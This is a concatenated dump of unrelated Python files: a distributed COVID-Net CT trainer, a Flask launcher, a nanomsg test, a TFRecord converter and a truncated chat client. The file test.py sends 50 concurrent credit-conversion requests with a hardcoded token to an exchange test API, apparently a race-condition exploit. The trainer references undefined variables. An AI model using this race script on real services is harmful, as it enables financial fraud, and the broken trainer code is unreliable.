    raise ValueError('Unknown schedule_type: {}'.format(schedule_type))
class Metrics:
"""Lightweight class for tracking metrics"""
def __init__(self):
num_classes = len(CLASS_NAMES)
self.labels = list(range(num_classes))
self.class_names = CLASS_NAMES
self.confusion_matrix = np.zeros((num_classes, num_classes), dtype=np.uint32)
def update(self, y_true, y_pred):
self.confusion_matrix = self.confusion_matrix + confusion_matrix(y_true, y_pred, labels=self.labels)
def reset(self):
self.confusion_matrix *= 0
def values(self):
conf_matrix = self.confusion_matrix.astype('float')
metrics = {
'accuracy': np.diag(conf_matrix).sum() / conf_matrix.sum(),
'confusion matrix': self.confusion_matrix.copy()
}
sensitivity = np.diag(conf_matrix) / np.maximum(conf_matrix.sum(axis=1), 1)
pos_pred_val = np.diag(conf_matrix) / np.maximum(conf_matrix.sum(axis=0), 1)
for cls, idx in zip(self.class_names, self.labels):
metrics['{} {}'.format(cls, 'sensitivity')] = sensitivity[idx]
metrics['{} {}'.format(cls, 'PPV')] = pos_pred_val[idx]
return metrics
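# Usage sketch for Metrics (label values are illustrative): accumulate batch predictions,
# then read the derived values; per-class entries are keyed by CLASS_NAMES:
#   m = Metrics()
#   m.update(y_true=[0, 1, 2], y_pred=[0, 1, 1])
#   m.values()['accuracy']              # diagonal sum / total
#   m.values()['COVID-19 sensitivity']  # per-class recall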
class COVIDNetCTRunner:
"""Primary training/testing/inference class"""
def __init__(self, meta_file, ckpt=None, data_dir=None, input_height=512, input_width=512,
lr=0.001, momentum=0.9, fc_only=False, max_bbox_jitter=0.025, max_rotation=10,
max_shear=0.15, max_pixel_shift=10, max_pixel_scale_change=0.2):
self.meta_file = meta_file
self.ckpt = ckpt
self.input_height = input_height
self.input_width = input_width
if data_dir is None:
self.dataset = None
else:
self.dataset = COVIDxCTDataset(
data_dir,
image_height=input_height,
image_width=input_width,
max_bbox_jitter=max_bbox_jitter,
max_rotation=max_rotation,
max_shear=max_shear,
max_pixel_shift=max_pixel_shift,
max_pixel_scale_change=max_pixel_scale_change
)
# Load graph/checkpoint and add optimizer
self.graph, self.sess, self.saver = load_graph(self.meta_file)
with self.graph.as_default():
# self.train_op = self._add_optimizer(lr, momentum, fc_only)
# self.grads = self.get_gradients(lr, momentum)
# self.only_gradients = [g for g, _ in self.grads]
self.placeholder_gradients = []
for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
self.placeholder_gradients.append((tf.placeholder('float', shape=var.get_shape()), var))
# print(self.placeholder_gradients)
self.apply_grads = self.apply_gradients(lr, momentum, self.placeholder_gradients, fc_only)
# Initialize
self.sess.run(tf.global_variables_initializer())
load_ckpt(self.ckpt, self.sess, self.saver)
def trainval(self, epochs, output_dir, batch_size=1, train_split_file='train.txt', val_split_file='val.txt',
log_interval=20, val_interval=1000, save_interval=1000):
"""Run training with intermittent validation"""
ckpt_path = os.path.join(output_dir, CKPT_NAME)
with self.graph.as_default():
# Copy original graph without optimizer
# shutil.copy(self.meta_file, output_dir)
# Create train dataset
# dataset, num_images, batch_size = self.dataset.train_dataset(train_split_file, batch_size)
# data_next = dataset.make_one_shot_iterator().get_next()
# num_iters = ceil(num_images / batch_size) * epochs
# Create feed and fetch dicts
# feed_dict = {TRAINING_PH_TENSOR: True}
# fetch_dict = {
# TRAIN_OP_KEY: self.train_op,
# TRAIN_OP_KEY: self.only_gradients,
# LOSS_KEY: LOSS_TENSOR
# }
# Add summaries
# summary_writer = tf.summary.FileWriter(os.path.join(output_dir, 'events'), self.graph)
# fetch_dict[TF_SUMMARY_KEY] = self._get_train_summary_op()
# Create validation function
# run_validation = self._get_validation_fn(batch_size, val_split_file)
# Baseline saving and validation
# print('Saving baseline checkpoint')
# saver = tf.train.Saver()
# saver.save(self.sess, ckpt_path, global_step=0, write_meta_graph=False)
# print('Starting baseline validation')
# metrics = run_validation()
# self._log_and_print_metrics(metrics, 0, summary_writer)
feed_dict = {}
j = 0
for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
feed_dict[self.placeholder_gradients[j][0]] = np.zeros(self.placeholder_gradients[j][0].shape)
j = j + 1
# Training loop
print('Training with batch_size {} for {} steps'.format(batch_size, num_iters))
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.connect((TCP_IP, port))
global global_var_vals
global done_flag
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to port : ", port, " and no of workers: ", MAX_WORKERS)
s.bind((TCP_IP, port))
s.listen(5)
var_val = []
for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
var_val.append(self.sess.run(v, feed_dict=feed_dict))
# print("Var val:: ",var_val)
send_data = pickle.dumps(var_val, pickle.HIGHEST_PROTOCOL)
# print("Send the send_data:: ",send_data)
global_var_vals.value = send_data
size = len(send_data)
print("Send the size:: ", size)
size = pickle.dumps(size, pickle.HIGHEST_PROTOCOL)
# print("Send the size in bytes:: ",size)
for i in range(MAX_WORKERS):
conn, addr = s.accept()
# print("Conn: {}, Addr: {}".format(conn, addr))
conn.sendall(size)
# print("Sent Size")
conn.sendall(send_data)
conn.close()
s.close()
print("Sent initial var values to workers")
for i in range(num_iters):
print("iteration no: "+str(i))
step_time = time.time()
opt_time = 0
for w in range(MAX_WORKERS):
recv_grads = gradients_q.get()
# print(recv_grads)
opt_start = time.time()
feed_dict = {}
for j, grad_var in enumerate(recv_grads):
feed_dict[self.placeholder_gradients[j][0]] = recv_grads[j]
res = self.sess.run(self.apply_grads, feed_dict=feed_dict)
opt_time += time.time() - opt_start
print("Opt time " + str(opt_time))
other_start = time.time()
var_val = []
for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
# v_temp = self.sess.run(v, feed_dict=feed_dict)
v_temp = self.sess.run(v)
var_val.append(v_temp)
# print(var_val)
global_var_vals.value = pickle.dumps(var_val, pickle.HIGHEST_PROTOCOL)
print("Other time " + str(time.time() - other_start))
# print("New values of variables ready")
done_flag.value = 1
for i in range(MAX_WORKERS):
val = ack_q.get()
done_flag.value = 0
print("Step time " + str(time.time() - step_time))
# Run training step
# data = self.sess.run(data_next)
# feed_dict[IMAGE_INPUT_TENSOR] = data['image']
# feed_dict[LABEL_INPUT_TENSOR] = data['label']
# only_grads_val = self.sess.run(self.only_gradients, feed_dict=feed_dict)
# print(only_grads_val)
# results = self.sess.run(fetch_dict, feed_dict)
# only_grads_val = results[TRAIN_OP_KEY]
# only_grads_val = pickle.dumps(only_grads_val, pickle.HIGHEST_PROTOCOL)
# gradients_size = len(only_grads_val)
# gradients_size = pickle.dumps(gradients_size, pickle.HIGHEST_PROTOCOL)
# print("Size of gradients size; {}", gradients_size)
# s.sendall(gradients_size)
# s.sendall(only_grads_val)
# recv_size = safe_recv(17, s)
# recv_size = pickle.loads(recv_size)
# recv_data = safe_recv(recv_size, s)
# var_vals = pickle.loads(recv_data)
# print("recved grads")
# j = 0
# for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
# feed_dict[v] = var_vals[j]
# j = j + 1
# for j, grad_var in enumerate(only_grads_val):
# feed_dict[self.placeholder_gradients[j][0]] = only_grads_val[j]
# print(results)
# Log and save
# step = i + 1
# if step % log_interval == 0:
# summary_writer.add_summary(results[TF_SUMMARY_KEY], step)
# print('[step: {}, loss: {}]'.format(step, results[LOSS_KEY]))
# if step % save_interval == 0:
# print('Saving checkpoint at step {}'.format(step))
# saver.save(self.sess, ckpt_path, global_step=step, write_meta_graph=False)
# if val_interval > 0 and step % val_interval == 0:
# print('Starting validation at step {}'.format(step))
# metrics = run_validation()
# self._log_and_print_metrics(metrics, step, summary_writer)
# print('Saving checkpoint at last step')
# saver.save(self.sess, ckpt_path, global_step=num_iters, write_meta_graph=False)
def test(self, batch_size=1, test_split_file='test.txt', plot_confusion=False):
"""Run test on a checkpoint"""
with self.graph.as_default():
# Run test
print('Starting test')
metrics = self._get_validation_fn(batch_size, test_split_file)()
self._log_and_print_metrics(metrics)
if plot_confusion:
# Plot confusion matrix
fig, ax = plt.subplots()
disp = ConfusionMatrixDisplay(confusion_matrix=metrics['confusion matrix'],
display_labels=CLASS_NAMES)
disp.plot(include_values=True, cmap='Blues', ax=ax, xticks_rotation='horizontal', values_format='.5g')
plt.show()
def infer(self, image_file, autocrop=True):
"""Run inference on the given image"""
# Load and preprocess image
image = cv2.imread(image_file, cv2.IMREAD_GRAYSCALE)
if autocrop:
image, _ = auto_body_crop(image)
image = cv2.resize(image, (self.input_width, self.input_height), interpolation=cv2.INTER_CUBIC)
image = image.astype(np.float32) / 255.0
image = np.expand_dims(np.stack((image, image, image), axis=-1), axis=0)
# Create feed dict
feed_dict = {IMAGE_INPUT_TENSOR: image, TRAINING_PH_TENSOR: False}
# Run inference
with self.graph.as_default():
# Add training placeholder if present
try:
self.sess.graph.get_tensor_by_name(TRAINING_PH_TENSOR)
feed_dict[TRAINING_PH_TENSOR] = False
except KeyError:
pass
# Run image through model
class_, probs = self.sess.run([CLASS_PRED_TENSOR, CLASS_PROB_TENSOR], feed_dict=feed_dict)
print('\nPredicted Class: ' + CLASS_NAMES[class_[0]])
print('Confidences: ' + ', '.join(
'{}: {}'.format(name, conf) for name, conf in zip(CLASS_NAMES, probs[0])))
print('**DISCLAIMER**')
print('Do not use this prediction for self-diagnosis. '
'You should check with your local authorities for '
'the latest advice on seeking medical assistance.')
def _add_optimizer(self, learning_rate, momentum, fc_only=False):
"""Adds an optimizer and creates the train op"""
# Create optimizer
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate,
momentum=momentum
)
# Create train op
global_step = tf.train.get_or_create_global_step()
loss = self.graph.get_tensor_by_name(LOSS_TENSOR)
grad_vars = optimizer.compute_gradients(loss)
if fc_only:
grad_vars = dense_grad_filter(grad_vars)
minimize_op = optimizer.apply_gradients(grad_vars, global_step)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
train_op = tf.group(minimize_op, update_ops)
# Initialize
self.sess.run(tf.global_variables_initializer())
return train_op
def get_gradients(self, learning_rate, momentum):
# Create optimizer
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate,
momentum=momentum
)
loss = self.graph.get_tensor_by_name(LOSS_TENSOR)
grad_vars = optimizer.compute_gradients(loss)
return grad_vars
def apply_gradients(self, learning_rate, momentum, gradients, fc_only=False):
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate,
momentum=momentum
)
# Create train op
global_step = tf.train.get_or_create_global_step()
if fc_only:
gradients = dense_grad_filter(gradients)
minimize_op = optimizer.apply_gradients(gradients, global_step)
# update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
# train_op = tf.group(minimize_op, update_ops)
# return train_op
return minimize_op
def _get_validation_fn(self, batch_size=1, val_split_file='val.txt'):
"""Creates validation function to call in self.trainval() or self.test()"""
# Create val dataset
dataset, num_images, batch_size = self.dataset.validation_dataset(val_split_file, batch_size)
dataset = dataset.repeat() # repeat so there is no need to reconstruct it
data_next = dataset.make_one_shot_iterator().get_next()
num_iters = ceil(num_images / batch_size)
# Create running accuracy metric
metrics = Metrics()
# Create feed and fetch dicts
fetch_dict = {'classes': CLASS_PRED_TENSOR}
feed_dict = {}
# Add training placeholder if present
try:
self.sess.graph.get_tensor_by_name(TRAINING_PH_TENSOR)
feed_dict[TRAINING_PH_TENSOR] = False
except KeyError:
pass
def run_validation():
metrics.reset()
for i in range(num_iters):
data = self.sess.run(data_next)
feed_dict[IMAGE_INPUT_TENSOR] = data['image']
results = self.sess.run(fetch_dict, feed_dict)
metrics.update(data['label'], results['classes'])
return metrics.values()
return run_validation
@staticmethod
def _log_and_print_metrics(metrics, step=None, summary_writer=None, tag_prefix='val/'):
"""Helper for logging and printing"""
# Pop temporarily and print
cm = metrics.pop('confusion matrix')
print('\tconfusion matrix:')
print('\t' + str(cm).replace('\n', '\n\t'))
# Print scalar metrics
for name, val in sorted(metrics.items()):
print('\t{}: {}'.format(name, val))
# Log scalar metrics
if summary_writer is not None:
summary = simple_summary(metrics, tag_prefix)
summary_writer.add_summary(summary, step)
# Restore confusion matrix
metrics['confusion matrix'] = cm
def _get_train_summary_op(self, tag_prefix='train/'):
loss = self.graph.get_tensor_by_name(LOSS_TENSOR)
loss_summary = tf.summary.scalar(tag_prefix + 'loss', loss)
return loss_summary
def main():
# global s
# global port
# global MAX_WORKERS
global gradients_q
global global_var_vals
global ack_q
global done_flag
# port = int(sys.argv[1])
# MAX_WORKERS = int(sys.argv[2])
# port = 17000
# MAX_WORKERS = 1
gradients_q = Queue()
ack_q = Queue()
manager = Manager()
global_var_vals = manager.Value(c_char_p, "")
done_flag = manager.Value('i', 0)
# n = int(FLAGS.max_steps / MAX_WORKERS)
# print("Each worker does ", n, " iterations")
process_list = []
for i in range(MAX_WORKERS):
process_port = port + i + 1
p = Process(target=handleWorker, args=(process_port, gradients_q, done_flag, global_var_vals, ack_q, num_iters))
p.start()
process_list.append(p)
# Suppress most TF messages
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
mode, args = parse_args(sys.argv[1:])
# Create full paths
meta_file = os.path.join(args.model_dir, args.meta_name)
ckpt = os.path.join(args.model_dir, args.ckpt_name)
# Create runner
if mode == 'train':
train_kwargs = dict(
lr=args.learning_rate,
momentum=args.momentum,
fc_only=args.fc_only,
max_bbox_jitter=args.max_bbox_jitter,
max_rotation=args.max_rotation,
max_shear=args.max_shear,
max_pixel_shift=args.max_pixel_shift,
max_pixel_scale_change=args.max_pixel_scale_change
)
else:
train_kwargs = {}
runner = COVIDNetCTRunner(
meta_file,
ckpt=ckpt,
data_dir=args.data_dir,
input_height=args.input_height,
input_width=args.input_width,
**train_kwargs
)
if mode == 'train':
# Create output_dir and save run settings
output_dir = os.path.join(OUTPUT_DIR, MODEL_NAME + args.output_suffix)
# os.makedirs(output_dir, exist_ok=False)
# with open(os.path.join(output_dir, 'run_settings.json'), 'w') as f:
# json.dump(vars(args), f)
# Run trainval
runner.trainval(
args.epochs,
output_dir,
batch_size=args.batch_size,
train_split_file=args.train_split_file,
val_split_file=args.val_split_file,
log_interval=args.log_interval,
val_interval=args.val_interval,
save_interval=args.save_interval
)
elif mode == 'test':
# Run validation
runner.test(
batch_size=args.batch_size,
test_split_file=args.test_split_file,
plot_confusion=args.plot_confusion
)
elif mode == 'infer':
# Run inference
runner.infer(args.image_file, not args.no_crop)
if __name__ == '__main__':
main()
|
brainless.py
|
"""
Brainless launcher
"""
from flask import render_template
from configuration import app, db
from datetime import datetime
import continuous_threading
from daemons.sync import sync_accounts
# Create a URL route in our application for "/"
@app.route('/')
def brainless():
print('BBRRRAAAIIIINNNNSSSS')
# background worker daemons
sync_daemon = continuous_threading.PeriodicThread(10, target=sync_accounts)
brainless_daemon = continuous_threading.PausableThread(target=brainless)
#@app.before_first_request
def _run_on_start():
"""
Responsible for all needed operations
before starting the full application
"""
db.metadata.create_all(db.engine)
#sync_daemon.start()
#brainless_daemon.start()
def home():
"""
This function just responds to the browser URL
localhost:5000/
:return: the rendered template 'home.html'
"""
return render_template('home.html')
# If we're running in stand alone mode, run the application
if __name__ == '__main__':
_run_on_start()
app.run(host='0.0.0.0', port=5000, debug=True, use_reloader=False)
|
test_pipeline_threaded.py
|
import unittest
import threading
import nanomsg as nn
class ThreadedPipelineTest(unittest.TestCase):
def test_pipeline(self):
result = []
def ping(url, ack):
with nn.Socket(protocol=nn.NN_PUSH) as sock, sock.connect(url):
sock.send(b'Hello, world!')
# Shutdown the endpoint after the other side ack'ed;
# otherwise the message could be lost.
ack.wait()
def pong(url, ack):
with nn.Socket(protocol=nn.NN_PULL) as sock, sock.bind(url):
message = sock.recv()
result.append(bytes(message.as_memoryview()).decode('ascii'))
ack.set()
ack = threading.Event()
url = 'inproc://test'
threads = [
threading.Thread(target=ping, args=(url, ack)),
threading.Thread(target=pong, args=(url, ack)),
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual(['Hello, world!'], result)
if __name__ == '__main__':
unittest.main()
|
test.py
|
# coding=utf-8
import requests
import json
from time import time
import threading
import csv
data = {
"coin_type": "BSV",
"flat_amount": "99900",
"totp_captcha": {"validate_code": "111111", "sequence": ""}
}
# Define the data to be sent
# Define the request headers
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
'Content-Type': 'application/json; charset=UTF-8',
'Authorization': '53383C06B6E449FFB5444432B456F72E'
}
# Define the request function
def Clean():
# URL of the API endpoint
requrl = "http://test2.coinex.com/res/credit/to/flat?X-CSRF-TOKEN=DI12i7hp"
# Connect to the server
# Send the request
response = requests.post(requrl, headers=headers, data=json.dumps(data))
# Print the response
print(response.json())
# Create a list to hold the threads
threads = []
# Create 50 threads
for i in range(50):
# Create a thread for the request function
t = threading.Thread(target=Clean, args=())
# Add the thread to the thread list
threads.append(t)
# print('start:')
if __name__ == '__main__':
# Start the threads
for i in threads:
i.start()
# Wait for the threads to finish
for i in threads:
i.join()
#print('end:', ctime())
|
build_image_data.py
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
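# Hedged sketch (illustrative only; not used by this conversion pipeline): how a serialized
# Example produced above could be parsed back, assuming the same feature keys.
def _parse_example_sketch(serialized_example):
    features = tf.parse_single_example(serialized_example, features={
        'image/encoded': tf.FixedLenFeature([], tf.string),
        'image/class/label': tf.FixedLenFeature([], tf.int64),
        'image/class/text': tf.FixedLenFeature([], tf.string, default_value=''),
        'image/height': tf.FixedLenFeature([], tf.int64),
        'image/width': tf.FixedLenFeature([], tf.int64),
    })
    image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
    return image, features['image/class/label']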
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
client.py
|
#!/usr/bin/env python3
"""Script for Tkinter GUI chat client."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import random
import tkinter
import webbrowser
import tkinter.messagebox
messages_sent_count = 0
connected = False
def display(text):
global chat_display
if not text.startswith('['):
text = '[CLIENT] ' + text
print(text)
random_message_id = random.randint(1000000000, 9999999999)
chat_display.config(state='normal')
if text.startswith('[CLIENT] ERROR') or text.startswith('[SERVER] ERROR'):
chat_display.tag_config(random_message_id, font=('Consolas', 20, 'bold'), foreground='red')
chat_display.insert('end', text + '\n', random_message_id)
else:
chat_display.tag_config(random_message_id, font=('Consolas', 20))
chat_display.insert('end', text.split()[0] + ' ', random_message_id)
chat_display.insert('end', ' '.join(text.split()[1:]) + '\n')
chat_display.see('end')
chat_display.config(state='disabled')
def receive():
"""Handles receiving of messages."""
while True:
try:
